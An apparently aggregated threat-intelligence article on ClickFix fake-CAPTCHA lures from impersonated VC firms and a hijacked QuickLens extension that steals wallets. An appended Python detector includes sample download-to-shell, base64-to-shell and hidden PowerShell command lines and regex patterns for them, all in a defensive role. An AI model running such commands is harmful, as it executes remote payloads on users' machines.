Anonymous Intelligence Signal

‘ClickFix’ Hackers Impersonate VCs, Hijack QuickLens Extension in Coordinated Crypto Attack

Category: AI / The Vault (unverified). Published 2026-03-03 05:48:25. Source: SearXNG, query "crypto scam exposed".

Cybersecurity threat intelligence indicates a significant evolution in cryptocurrency-focused attack methodologies, with threat actors now employing sophisticated social engineering techniques that bypass traditional security controls. Recent analysis reveals two distinct but complementary attack vectors that have emerged as primary tools for stealing digital assets from cryptocurrency users and investors.

The first attack vector involves the creation of fraudulent venture capital firm personas, specifically targeting professionals in the cryptocurrency and technology sectors through professional networking platforms. Threat actors have established fake investment entities including SolidBit Capital, MegaBit Capital, and Lumax Capital, using these fictitious firms to initiate contact with potential victims via LinkedIn. The initial contact typically involves seemingly legitimate partnership or investment opportunities, which subsequently redirect targets to malicious video conferencing links hosted on counterfeit Zoom and Google Meet domains.

Once a target opens one of the fraudulent meeting links, they are presented with a fabricated Cloudflare CAPTCHA verification page. This social engineering mechanism, termed the ClickFix technique, prompts users to copy a command to their clipboard and execute it in their terminal application. The approach is particularly effective because it turns the victim into the delivery mechanism, sidestepping conventional endpoint detection and response systems that would typically flag a suspicious file download or exploit attempt. Security researchers have noted that the technique removes the need for traditional exploit frameworks or malicious attachments, which makes detection significantly harder for security operations teams.

The second attack vector involves the compromise of legitimate browser extensions, specifically targeting extensions with substantial user bases in the technology and cryptocurrency communities. Recent analysis identified QuickLens, a Google Lens integration extension with approximately 7,000 active users, which was compromised following a change of ownership on February 1st. The malicious version, released two weeks after acquisition, incorporated scripts designed to harvest cryptocurrency wallet credentials, seed phrases, and sensitive financial data. Additionally, the compromised extension was configured to exfiltrate Gmail inbox contents, YouTube channel authentication tokens, and various login credentials entered into web forms.

The ClickFix methodology has demonstrated particular effectiveness across multiple industry verticals beyond cryptocurrency, with Microsoft Threat Intelligence documenting campaigns targeting thousands of enterprise and end-user devices globally on a daily basis. Industries particularly affected include manufacturing, wholesale and retail operations, government entities at the state and local levels, utilities, and energy sector organizations. This widespread adoption by threat actors reflects the technique's effectiveness at bypassing security controls that organizations have invested in over many years.

The infrastructure supporting these campaigns demonstrates advanced operational security practices, including the rotation of identities and attack infrastructure as soon as individual campaign elements are exposed or analyzed by security researchers. This dynamic approach to campaign management significantly complicates attribution efforts and reduces the effectiveness of traditional threat intelligence sharing mechanisms.

Organizations and individuals operating in cryptocurrency markets should implement enhanced verification protocols for any investment-related communications received through professional networking platforms, maintain heightened scrutiny of browser extension permissions, and ensure that terminal execution prompts receive additional validation before user execution.
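One way to put the last recommendation into practice, and to catch the paste-and-run step described in the ClickFix section above, is to flag terminal-spawned commands whose shape matches a lure (a download piped straight into a shell, an inline base64 blob decoded into a shell, or a hidden/encoded PowerShell launch). The detector below is an added illustration, not code from the article or from any vendor; the log format, the sample events and the set of terminal parent processes are all constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed process-creation events (not from the article): one event per
# line, fields separated by " | ": timestamp, parent process, command line.
SAMPLE_EVENTS = """\
2026-03-02T10:14:03Z | Terminal | ls -la ~/Documents
2026-03-02T10:15:41Z | Terminal | curl -fsSL https://lure.example/verify.sh | bash
2026-03-02T10:16:02Z | iTerm2 | echo aGVsbG8= | base64 -D | sh
2026-03-02T10:17:22Z | cmd.exe | powershell -w hidden -enc SQBFAFgA
2026-03-02T10:18:00Z | bash | git pull origin main
"""

# Assumed set of interactive shells/terminals a ClickFix page tells the victim
# to paste into; explorer.exe covers the Windows Run dialog. Widen as needed.
TERMINAL_PARENTS = {"Terminal", "iTerm2", "bash", "zsh", "cmd.exe",
                    "powershell.exe", "WindowsTerminal.exe", "explorer.exe"}

# Command shapes characteristic of paste-and-run lures.
PATTERNS = {
    "download_piped_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "base64_decoded_to_shell": re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "encoded_or_hidden_powershell": re.compile(
        r"powershell(\.exe)?\b.*(-enc\b|-w\s+hidden|-windowstyle\s+hidden)", re.I),
}

@dataclass
class Finding:
    timestamp: str
    parent: str
    rule: str
    command: str

def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    # maxsplit=2 keeps any " | " inside the command line intact.
    parts = [p.strip() for p in line.split(" | ", 2)]
    return (parts[0], parts[1], parts[2]) if len(parts) == 3 else None

def detect_clickfix(log_text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        ts, parent, cmd = event
        if parent not in TERMINAL_PARENTS:
            continue  # only terminal-launched commands are in scope here
        for rule, rx in PATTERNS.items():
            if rx.search(cmd):
                findings.append(Finding(ts, parent, rule, cmd))
                break  # report one rule per event
    return findings

if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.parent}: {f.rule} -> {f.command}")
```

In a real deployment the events would come from an EDR or auditd/Sysmon feed rather than an inline string, and the hit should be correlated with a browser visit shortly before it.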